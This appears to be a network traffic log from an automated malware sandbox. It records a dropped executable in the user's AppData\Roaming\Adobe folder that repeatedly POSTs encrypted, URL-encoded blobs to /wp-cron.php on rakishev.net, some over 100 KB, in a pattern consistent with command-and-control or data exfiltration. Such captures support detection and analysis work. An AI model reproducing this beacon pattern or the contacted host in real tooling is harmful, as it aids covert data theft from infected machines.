2023-10-03 20:37:41 UTC	3465	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:41 UTC	3466	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:41 UTC	3466	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:41 UTC	3466	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 37 58 59 7a 35 58 36 41 4e 6c 70 35 49 6f 37 69 45 56 51 6f 6d 73 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0V7XYz5X6ANlp5Io7iEVQoms7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49790	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:35:14 UTC	2778	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:35:14 UTC	2778	IN	HTTP/1.1 100 Continue
2023-10-03 20:35:14 UTC	2778	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:35:14 UTC	2778	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:35:15 UTC	2779	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:35:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aMgvxFxifSN7a8UCZh4py%2F%2FKpIMlqyqzX83T1PeJdy%2B%2F8ovAfVoA85OpCL8slsTZ2WaWpbXBWfVmM1g71aH1txv88S3bq%2BCcsQvOJg8qZVQ2Hv3BTxzx8SDPse1EPpc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107f8710f906f9d-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49889	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:41 UTC	3466	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 118294 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:41 UTC	3466	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:41 UTC	3467	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:41 UTC	3467	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 69 66 31 58 6e 41 54 71 63 49 42 62 48 78 6e 47 46 6c 6b 6c 55 59 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUif1XnATqcIBbHxnGFlklUYIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:37:41 UTC	3482	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:37:41 UTC	3482	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:37:41 UTC	3498	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:37:41 UTC	3498	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:37:41 UTC	3514	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:37:41 UTC	3514	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:37:41 UTC	3530	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:37:41 UTC	3530	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:37:41 UTC	3546	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:37:41 UTC	3546	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:37:41 UTC	3562	OUT	Data Raw: 79 Data Ascii: y
2023-10-03 20:37:41 UTC	3562	OUT	Data Raw: 59 6c 33 66 57 4e 70 66 6e 6c 32 6b 49 48 61 52 44 64 69 47 6a 49 43 41 4b 54 67 6a 67 7a 56 53 66 78 62 44 76 41 25 32 42 30 78 48 67 36 52 71 72 79 76 42 53 39 32 5a 51 31 51 68 69 32 77 46 76 6f 65 44 4e 30 68 45 52 53 49 43 6c 35 54 66 51 55 6f 58 72 66 38 4d 38 44 43 4d 33 73 5a 5a 33 43 4f 47 4b 34 5a 58 64 34 57 54 6c 6e 6d 38 4b 73 6c 6d 75 47 76 68 4e 4c 4e 53 64 54 78 4f 4d 79 75 25 32 42 43 6f 77 78 76 4e 77 4b 69 6b 4d 66 4a 56 55 58 55 7a 4d 6e 6d 75 6b 56 6f 55 33 6c 52 7a 52 4b 31 38 52 75 54 6d 51 70 49 2f 6e 48 50 41 6d 4a 66 56 57 48 6b 39 63 75 43 2f 62 30 51 32 49 25 32 42 39 6d 53 52 67 6e 47 78 66 64 45 79 38 49 39 38 62 30 2f 70 48 54 66 74 25 32 42 55 56 56 48 55 64 63 32 7a 34 67 4a 45 7a 59 70 5a 53 70 31 30 58 35 59 4b 33 6d 70 Data Ascii: Yl3fWNpfnl2kIHaRDdiGjICAKTgjgzVSfxbDvA%2B0xHg6RqryvBS92ZQ1Qhi2wFvoeDN0hERSICl5TfQUoXrf8M8DCM3sZZ3COGK4ZXd4WTlnm8KslmuGvhNLNSdTxOMyu%2BCowxvNwKikMfJVUXUzMnmukVoU3lRzRK18RuTmQpI/nHPAmJfVWHk9cuC/b0Q2I%2B9mSRgnGxfdEy8I98b0/pHTft%2BUVVHUdc2z4gJEzYpZSp10X5YK3mp
2023-10-03 20:37:41 UTC	3578	OUT	Data Raw: 32 Data Ascii: 2
2023-10-03 20:37:41 UTC	3578	OUT	Data Raw: 54 36 63 58 37 72 63 44 42 42 31 2f 6f 75 42 36 4f 51 63 78 51 78 4d 6c 30 45 33 33 70 4c 33 42 50 4a 79 35 74 78 74 34 2f 74 42 74 73 4f 4b 69 48 76 70 4b 7a 63 69 64 46 25 32 42 6a 53 33 66 75 5a 64 30 34 4f 74 38 79 47 64 65 6a 53 30 4a 46 62 33 37 6d 75 79 44 32 59 34 42 55 38 4f 4f 6f 77 31 71 52 59 4c 59 65 5a 65 6f 56 68 35 70 6c 4a 55 6f 36 44 44 4a 59 2f 54 55 36 4b 47 37 74 63 76 51 77 50 4e 64 53 4e 75 36 4c 55 4e 49 72 4e 50 43 43 37 67 5a 78 45 6e 66 42 4a 77 43 66 4f 33 75 51 4d 46 70 41 42 39 4d 5a 67 62 36 4e 68 68 6f 64 44 67 32 68 6b 66 54 64 66 6b 61 56 36 49 54 62 53 62 4c 51 67 72 37 72 38 55 77 63 62 72 25 32 42 42 37 55 71 42 76 63 53 73 57 6a 51 76 64 33 35 5a 4d 50 65 30 4e 72 76 4e 45 75 6c 68 38 71 49 25 32 42 66 4e 57 62 46 66 Data Ascii: T6cX7rcDBB1/ouB6OQcxQxMl0E33pL3BPJy5txt4/tBtsOKiHvpKzcidF%2BjS3fuZd04Ot8yGdejS0JFb37muyD2Y4BU8OOow1qRYLYeZeoVh5plJUo6DDJY/TU6KG7tcvQwPNdSNu6LUNIrNPCC7gZxEnfBJwCfO3uQMFpAB9MZgb6NhhodDg2hkfTdfkaV6ITbSbLQgr7r8Uwcbr%2BB7UqBvcSsWjQvd35ZMPe0NrvNEulh8qI%2BfNWbFf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49891	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:43 UTC	3583	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:43 UTC	3583	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:43 UTC	3583	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:43 UTC	3583	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:37:44 UTC	3694	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zqsGRzisY1P8otpc0YATnIPoV%2FDdnBQPvLx%2F6RRZ9%2F22tt5lKyOhFNDGlB4839U80OP7Gx5zTqckNdFpAOtmZAqbNSkL2PQkH3sytPkqRpwWjViAZk6LmgD%2Fd5TnZ8o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc14687e1766-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49892	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:43 UTC	3583	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112820 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:43 UTC	3584	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:43 UTC	3584	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:43 UTC	3584	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 46 56 71 75 56 33 72 30 55 5a 41 54 6c 54 4e 46 67 55 51 4d 55 34 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUFVquV3r0UZATlTNFgUQMU4IMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:37:43 UTC	3600	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:37:43 UTC	3600	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:37:43 UTC	3616	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:37:43 UTC	3616	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:37:43 UTC	3632	OUT	Data Raw: 5a Data Ascii: Z
